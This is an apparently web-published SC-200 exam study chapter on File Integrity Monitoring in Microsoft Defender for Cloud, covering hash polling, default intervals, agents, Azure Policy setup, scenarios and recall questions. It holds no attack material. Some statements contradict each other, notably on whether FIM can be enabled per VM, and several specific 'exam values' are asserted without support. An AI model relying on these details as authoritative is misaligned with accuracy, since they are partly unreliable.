This chapter covers File Integrity Monitoring (FIM) in Microsoft Defender for Cloud and Defender for Servers, a key topic for the SC-200 exam under objective 3.1: Configure and manage Defender for Cloud. FIM is a critical security control that detects unauthorized changes to files, registries, and other system components. Approximately 5-10% of SC-200 exam questions touch on FIM, including its configuration, alerts, and integration with other Defender features. Understanding FIM's mechanism, default settings, and common pitfalls is essential for passing the exam and for real-world security operations.
Jump to a section
File Integrity Monitoring (FIM) works like a museum security guard who keeps a detailed inventory of every artifact's condition on a clipboard. Every hour, the guard walks through the museum and compares each artifact against the clipboard. If a statue is slightly turned, a painting frame is chipped, or a display case glass is cracked, the guard immediately notes the change, takes a timestamped photo, and radios the control room. The guard does not judge whether the change is good or bad—just that a change occurred. Similarly, FIM takes a cryptographic hash (like a unique fingerprint) of critical files at a baseline moment. Then, at regular intervals (e.g., every hour), it recalculates the hash and compares it to the baseline. Any mismatch triggers an alert with details like which file changed, when, and the old vs. new hash. Just as the guard cannot prevent a thief from breaking in but can detect the aftermath, FIM does not prevent file changes but detects unauthorized modifications. The guard's effectiveness depends on the accuracy of the initial inventory and the frequency of patrols—too infrequent, and a theft might go unnoticed until too late. Likewise, FIM's success relies on a clean baseline and appropriate monitoring frequency to balance detection speed with system load.
What is File Integrity Monitoring (FIM)?
File Integrity Monitoring (FIM) is a security feature in Microsoft Defender for Cloud (formerly Azure Security Center) that monitors critical system files, Windows registry keys, and other configuration files for changes. FIM detects unauthorized modifications that could indicate a security breach, such as malware altering system files, attackers adding backdoors, or misconfigurations that weaken security posture. FIM is part of the Microsoft Defender for Servers plan (P1 or P2), and it is available for both Azure VMs and on-premises servers connected via Azure Arc.
How FIM Works Internally
FIM operates by taking a cryptographic hash (SHA-256) of monitored files and registry keys at a baseline time. Then, at regular polling intervals, it recalculates the hash and compares it to the baseline. If the hash differs, an alert is generated. The process involves several components:
Baseline: The initial state of the file or registry key. Defenders recommend establishing a baseline when the system is known to be clean (e.g., after a fresh OS install).
Polling Interval: The frequency at which FIM checks for changes. Default is every 1 hour for files and every 6 hours for registry keys. You can configure this via Azure Policy or the Defender for Cloud settings.
Hash Algorithm: SHA-256 is used to create a unique fingerprint of the content. Changes to file metadata (e.g., permissions, owner) are also tracked but do not trigger a hash mismatch unless the content changes.
Comparison Engine: The FIM agent (part of the Log Analytics Agent or Azure Monitor Agent) compares the current hash to the stored baseline. If a change is detected, the agent sends the details to the Log Analytics workspace, which triggers an alert in Defender for Cloud.
Key Components, Values, and Defaults
Monitored Items: By default, FIM monitors:
Windows: system files in %SystemRoot%\System32, boot configuration data, and critical registry hives (e.g., HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet).
Linux: /etc/passwd, /etc/shadow, /bin, /sbin, and other common system binaries.
Default Polling Intervals: Files every 1 hour; Registry every 6 hours. These can be changed via Azure Policy (e.g., DeployFileIntegrityMonitoring policy).
Retention: Alerts are retained in the Log Analytics workspace for 90 days (by default). You can adjust the retention period.
Workspace: FIM data is sent to a Log Analytics workspace. The workspace must be in the same region as the monitored resources for optimal performance.
Agent: The Log Analytics Agent (MMA) or Azure Monitor Agent (AMA) is required. For Windows, MMA version 10.0.17763.1 or later; for Linux, MMA version 1.4.0 or later.
Configuration and Verification Commands
FIM is configured via Azure Policy, not manually per machine. The built-in policy is Deploy File Integrity Monitoring on Windows/Linux virtual machines. To enable FIM:
Assign the policy at the subscription or management group level.
The policy deploys the FIM solution to the Log Analytics workspace.
Verify via Defender for Cloud > Workload protections > File Integrity Monitoring.
To check if FIM is enabled on a VM, use Azure CLI:
az vm show --name MyVM --resource-group MyRG --query "resources[?type=='Microsoft.Compute/virtualMachines/extensions' && name=='MicrosoftMonitoringAgent']"Or PowerShell:
Get-AzVMExtension -ResourceGroupName MyRG -VMName MyVM -Name MicrosoftMonitoringAgentTo view FIM alerts, use:
az security alert list --subscription MySubscription --query "[?contains(name,'File Integrity')]"Interaction with Related Technologies
Defender for Cloud: FIM alerts appear in the Defender for Cloud portal under Security Alerts. They are also integrated with Microsoft Sentinel for SIEM use.
Azure Policy: FIM is deployed via policy, ensuring compliance at scale.
Azure Automation: Can be used to automatically remediate changes (e.g., revert a file to baseline).
Microsoft Defender for Endpoint (MDE): MDE also has its own FIM capabilities (change tracking), but Defender for Cloud's FIM is more focused on infrastructure-level changes. The exam may ask you to differentiate between the two.
Important Exam Notes
FIM is not a real-time detection tool; it is periodic. Expect latency up to the polling interval.
FIM does not prevent changes; it only detects them.
FIM can generate false positives if legitimate software updates occur. Use change management processes to suppress known good changes.
The default polling intervals are exam-relevant: 1 hour for files, 6 hours for registry.
FIM requires the Log Analytics Agent (MMA) or Azure Monitor Agent (AMA). The MMA is being deprecated; AMA is the future. The exam may test the agent requirements.
FIM is part of the Defender for Servers plan P1 or P2. Without a license, FIM is not available.
Step-by-Step: How FIM Processes a Change
Baseline Capture: At initial deployment, FIM takes a snapshot of all monitored files and registry keys. Hashes are stored in the Log Analytics workspace.
Polling: At the configured interval (e.g., 1 hour), the agent recalculates the hash of each monitored item.
Comparison: The new hash is compared to the baseline hash stored in the workspace.
Change Detection: If hashes differ, the agent logs the change details: file path, old hash, new hash, timestamp, and user context (if available via Windows security logs).
Alert Generation: The change is sent to the Log Analytics workspace, which triggers a Defender for Cloud alert. The alert severity is typically Medium or High.
Investigation: SOC analysts review the alert in Defender for Cloud or Sentinel. They can see the exact change and determine if it was authorized.
Baseline Update: If the change is authorized, the baseline can be updated to suppress future alerts. This is done by accepting the change in the FIM dashboard.
Common Misconfigurations
Too Broad Scope: Monitoring too many files causes noise and performance issues. Stick to default paths.
Infrequent Polling: Increasing polling interval beyond default reduces detection speed.
Ignoring False Positives: Not updating baseline after legitimate changes leads to alert fatigue.
Agent Not Installed: FIM does not work without the Log Analytics Agent or Azure Monitor Agent.
Exam Focus: SC-200 Objective 3.1
SC-200 tests FIM under objective 3.1: Configure and manage Defender for Cloud. Specific sub-objectives include:
Configure file integrity monitoring (FIM)
Interpret FIM alerts
Integrate FIM with Microsoft Sentinel
The exam expects you to know:
The default polling intervals
The agent requirements
How to enable FIM via Azure Policy
How to view and manage FIM alerts
The difference between FIM in Defender for Cloud vs. Defender for Endpoint
Common trap questions: - "Which agent is required for FIM?" (Answer: Log Analytics Agent or Azure Monitor Agent, not the Microsoft Defender for Endpoint agent alone) - "How often does FIM check registry keys?" (Answer: Every 6 hours by default) - "Can FIM be enabled on on-premises servers?" (Yes, via Azure Arc) - "Does FIM prevent changes?" (No, only detects)
Summary
File Integrity Monitoring in Defender for Cloud is a passive detective control that uses cryptographic hashing to detect unauthorized changes to files and registry keys. It is configured via Azure Policy, requires the Log Analytics Agent (or AMA), and generates alerts that are visible in Defender for Cloud and can be integrated with Sentinel. Key exam values: file polling interval = 1 hour, registry polling interval = 6 hours. FIM is part of Defender for Servers P1/P2. Understanding its mechanism, defaults, and integration points is critical for the SC-200 exam.
Enable FIM via Azure Policy
To enable FIM, assign the built-in Azure Policy 'Deploy File Integrity Monitoring on Windows/Linux virtual machines' at the subscription or management group level. This policy deploys the FIM solution to the Log Analytics workspace associated with the VMs. The policy also configures the polling intervals (default: 1 hour for files, 6 hours for registry). After assignment, the policy applies to all existing and future VMs in the scope. You can verify policy compliance in the Azure Policy dashboard.
Agent Installation and Baseline Creation
FIM requires the Log Analytics Agent (MMA) or Azure Monitor Agent (AMA) to be installed on the VM. The policy automatically installs the agent if not present. Once the agent is installed, it immediately takes a baseline snapshot of all monitored files and registry keys. This baseline includes SHA-256 hashes and file metadata. The baseline is stored in the Log Analytics workspace. It is crucial that the baseline is taken when the system is in a known good state to avoid false positives.
Periodic Polling and Hash Comparison
At the configured polling interval (default 1 hour for files, 6 hours for registry), the agent recalculates the SHA-256 hash of each monitored item. It then compares the new hash to the baseline hash stored in the workspace. If the hashes match, no action is taken. If they differ, the agent logs the change details, including the file path, old and new hashes, timestamp, and any available user context (e.g., from Windows Security Event ID 4656 or 4663).
Alert Generation and Notification
When a change is detected, the agent sends the change record to the Log Analytics workspace. Defender for Cloud processes this record and generates a security alert with severity Medium or High. The alert includes information such as the changed file path, the time of change, and the user account that made the change (if captured). The alert appears in the Defender for Cloud portal under Security Alerts and can be configured to trigger email notifications or integrate with SIEM tools like Microsoft Sentinel.
Investigation and Response
SOC analysts investigate the alert by reviewing the change details in Defender for Cloud or Sentinel. They can determine if the change was authorized (e.g., a software update) or malicious (e.g., a rootkit). If authorized, the analyst can accept the change, which updates the baseline to the new hash, suppressing future alerts for that same change. If malicious, the analyst can initiate incident response actions, such as isolating the VM or reverting the change using Azure Automation runbooks.
Baseline Update and Maintenance
After an authorized change, the baseline must be updated to prevent repeated alerts. This is done in the FIM dashboard by selecting the changed file and clicking 'Accept Change'. The new hash becomes the baseline. For bulk updates, you can use Azure Policy remediation tasks or PowerShell scripts. Regular maintenance includes reviewing FIM alerts, updating baselines after patching, and adjusting polling intervals based on performance and security requirements.
Enterprise Scenario 1: Financial Services Compliance
A large bank uses FIM to meet PCI DSS requirement 11.5, which mandates file integrity monitoring for critical system files. They have thousands of Windows and Linux servers across Azure and on-premises (via Azure Arc). The security team enables FIM using Azure Policy assigned at the management group level. They customize the polling interval to 15 minutes for high-security servers (e.g., payment processing) by modifying the policy parameters. They also integrate FIM alerts with Microsoft Sentinel for centralized monitoring. A common issue is false positives from legitimate software updates. To handle this, they use a change management process: authorized changes are logged in a ticketing system, and FIM alerts are automatically suppressed for those changes using Azure Automation and Logic Apps. The team monitors FIM alerts daily and conducts monthly baseline reviews.
Enterprise Scenario 2: Healthcare Organization Ransomware Detection
A hospital uses FIM to detect ransomware that modifies file extensions or encrypts files. They monitor file shares and critical medical record databases. FIM detects when a file's hash changes unexpectedly, triggering an alert. The hospital uses a polling interval of 30 minutes for file shares to balance detection speed with performance. They also monitor registry keys for persistence mechanisms. A challenge is that ransomware often changes many files at once, causing alert storms. To reduce noise, they implement aggregation rules in Sentinel to group similar alerts. They also use FIM in conjunction with Microsoft Defender for Endpoint's behavioral analysis to confirm ransomware activity. The hospital learned the hard way that FIM alone does not prevent encryption; it only detects it after the fact. They now combine FIM with backup and recovery procedures.
Performance Considerations
Agent Overhead: FIM polling consumes CPU and disk I/O. On busy servers, increasing polling frequency can impact performance. Default intervals are safe for most systems.
Workspace Ingestion: Each file change generates a log entry. High-change environments can inflate Log Analytics costs. Use monitoring scope and exclusion lists to limit noise.
Alert Volume: Without proper baseline updates, false positives can overwhelm SOC teams. Implement automated suppression for known good changes.
What Goes Wrong When Misconfigured
Too Broad Scope: Monitoring temporary directories (e.g., %TEMP%) causes thousands of alerts per day. Always use the default paths or carefully selected custom paths.
Infrequent Polling: Setting polling to every 24 hours might miss a breach window. Attackers can modify files and revert them within that window.
Ignoring Agent Health: If the Log Analytics Agent stops, FIM stops. Monitor agent heartbeat via Azure Monitor.
Not Updating Baseline: After patching, FIM alerts on every updated file. Failing to accept changes leads to alert fatigue and missed real threats.
SC-200 Exam Focus on File Integrity Monitoring
This section is the most critical for exam preparation. The SC-200 exam tests FIM under objective 3.1: Configure and manage Defender for Cloud. Specific sub-objectives include:
Configure file integrity monitoring (FIM)
Interpret FIM alerts
Integrate FIM with Microsoft Sentinel
Common Wrong Answers and Why Candidates Choose Them
Wrong: FIM prevents file changes. Candidates confuse detection with prevention. FIM is a detective control, not a preventive one. The exam will offer answers like 'FIM blocks unauthorized modifications' — this is false.
Wrong: FIM uses the Microsoft Defender for Endpoint agent. FIM requires the Log Analytics Agent (MMA) or Azure Monitor Agent (AMA), not the MDE agent. The MDE agent has its own change tracking capabilities, but the exam specifically asks about Defender for Cloud FIM.
Wrong: FIM polls every 15 minutes by default. The default for files is 1 hour, for registry 6 hours. The exam may list 15 minutes as a distractor.
Wrong: FIM is available in Defender for Cloud's free tier. FIM requires Defender for Servers P1 or P2. Without a paid plan, FIM is not available.
Specific Numbers and Terms That Appear on the Exam
Default polling intervals: Files = 1 hour, Registry = 6 hours.
Hash algorithm: SHA-256.
Agent: Log Analytics Agent (MMA) or Azure Monitor Agent (AMA).
Policy: 'Deploy File Integrity Monitoring on Windows/Linux virtual machines'.
Severity: Medium or High.
Retention: 90 days in Log Analytics workspace.
Edge Cases and Exceptions
On-premises servers: FIM can monitor on-premises servers if they are connected via Azure Arc. The exam may ask if FIM works for on-premises — answer is yes, with Azure Arc.
Linux vs. Windows: Default monitored paths differ. Linux includes /etc/passwd, /etc/shadow, /bin, /sbin. Windows includes system32 and critical registry hives.
Custom paths: You can add custom file paths via the FIM dashboard or Azure Policy parameters.
Multiple workspaces: If VMs report to different Log Analytics workspaces, FIM must be enabled per workspace.
How to Eliminate Wrong Answers
If an answer says FIM uses real-time monitoring, it's wrong — FIM is periodic.
If an answer says FIM is enabled per VM, it's wrong — FIM is enabled via Azure Policy for scale.
If an answer says FIM does not require an agent, it's wrong — agent is mandatory.
If an answer says FIM is available without Defender for Servers, it's wrong — requires P1 or P2.
Exam Tips
Memorize the default polling intervals.
Know the agent requirements.
Understand that FIM is a detective control.
Be able to differentiate FIM in Defender for Cloud vs. Defender for Endpoint (the latter is more real-time and uses a different agent).
Practice interpreting FIM alerts in the Azure portal or via sample alerts.
FIM detects unauthorized changes by comparing SHA-256 hashes at configurable intervals.
Default polling interval for files is 1 hour; for registry keys is 6 hours.
FIM requires the Log Analytics Agent (MMA) or Azure Monitor Agent (AMA).
FIM is enabled via Azure Policy 'Deploy File Integrity Monitoring on Windows/Linux virtual machines'.
FIM is a detective control, not preventive or real-time.
FIM is part of Defender for Servers P1 or P2, not the free tier.
On-premises servers need Azure Arc to use FIM.
After authorized changes, update the baseline to suppress false positives.
These come up on the exam all the time. Here's how to tell them apart.
Defender for Cloud FIM
Uses Log Analytics Agent or Azure Monitor Agent.
Periodic polling (default 1 hour files, 6 hours registry).
Configured via Azure Policy at scale.
Alerts in Defender for Cloud, integrated with Sentinel.
Focuses on infrastructure files and registry keys.
Defender for Endpoint Change Tracking
Uses Microsoft Defender for Endpoint agent (Sense).
Near real-time (event-driven, not polling).
Built into MDE, no separate policy required.
Alerts in MDE portal, also integrates with Sentinel.
Focuses on endpoint-level changes including memory, processes, and files.
Mistake
FIM blocks unauthorized file changes in real time.
Correct
FIM is a detective control, not a preventive one. It detects changes after they occur by comparing hashes at polling intervals. It does not block or revert changes automatically unless combined with Azure Automation runbooks.
Mistake
FIM uses the Microsoft Defender for Endpoint agent.
Correct
FIM in Defender for Cloud requires the Log Analytics Agent (MMA) or Azure Monitor Agent (AMA). The MDE agent has its own change tracking, but it is not the same as Defender for Cloud FIM.
Mistake
FIM monitors all files on the system by default.
Correct
FIM only monitors a predefined set of critical files and registry keys. You can add custom paths, but the default scope is limited to system files and important configuration locations.
Mistake
FIM polling intervals are the same for files and registry.
Correct
Files are polled every 1 hour by default, while registry keys are polled every 6 hours. This is a common exam trick.
Mistake
FIM is available in the free tier of Defender for Cloud.
Correct
FIM requires the Defender for Servers plan P1 or P2. The free tier only provides basic security assessments, not FIM.
Reveal each answer, then mark whether you got it right. Score 60%+ to unlock the next chapter.
Enable FIM by assigning the built-in Azure Policy 'Deploy File Integrity Monitoring on Windows/Linux virtual machines' at the subscription or management group level. This policy deploys the necessary agent and configures FIM. You can also enable it per VM from the Defender for Cloud portal under 'File Integrity Monitoring' but policy is recommended for scale.
By default, FIM polls files every 1 hour and registry keys every 6 hours. These intervals can be customized via Azure Policy parameters. For exam purposes, remember these default values.
Yes, FIM works on on-premises servers if they are connected to Azure via Azure Arc. The server must have the Log Analytics Agent or Azure Monitor Agent installed and be part of a Log Analytics workspace with FIM enabled.
Defender for Cloud FIM uses periodic polling with the Log Analytics Agent and focuses on infrastructure files/registry. Defender for Endpoint change tracking is near real-time, uses the MDE agent, and covers broader endpoint activities. Both generate alerts but in different portals.
Update the baseline after authorized changes by accepting the change in the FIM dashboard. You can also exclude certain paths or files from monitoring, and use Azure Automation to automatically suppress alerts for known good changes (e.g., from patch management tools).
FIM requires the Microsoft Defender for Servers plan P1 or P2. Without this license, FIM is not available. The free tier of Defender for Cloud does not include FIM.
Yes, you can add custom file paths to monitor via the FIM dashboard or by modifying the Azure Policy assignment. However, the default paths cover critical system files and registry keys.
You've just covered File Integrity Monitoring in Defender — now see how well it sticks with free SC-200 practice questions. Full explanations included, no account needed.
Done with this chapter?